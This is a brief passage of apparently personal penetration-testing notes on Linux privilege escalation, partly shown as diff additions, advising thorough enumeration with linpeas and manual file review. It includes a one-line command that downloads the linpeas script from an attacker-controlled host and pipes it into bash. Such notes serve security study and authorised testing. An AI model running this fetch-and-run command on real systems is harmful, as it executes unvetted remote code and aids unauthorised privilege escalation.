ChaseHCS/methodology/Privesc/Linux/common.md

 `curl -sL http://<myip>/linpeas.sh | bash`

 It is important to carefully read over the output, even the output that linpeas doesn't highlight red.

+### Furthur Enumeration

+If the `one-liners` **AND** `linpeas` didn't find anything useful, the answer is probably very simple.
+You most likely just need to like into the files you have read access too.
+This includes things like:

+- Web config files and source code.
+- Files in your users home directory.
+- Application version exploit *OR* Linux kernel exploit.

+If none of the above worked or showed anything interesting, restart from the top, you probably missed something.

+## Obtaining Root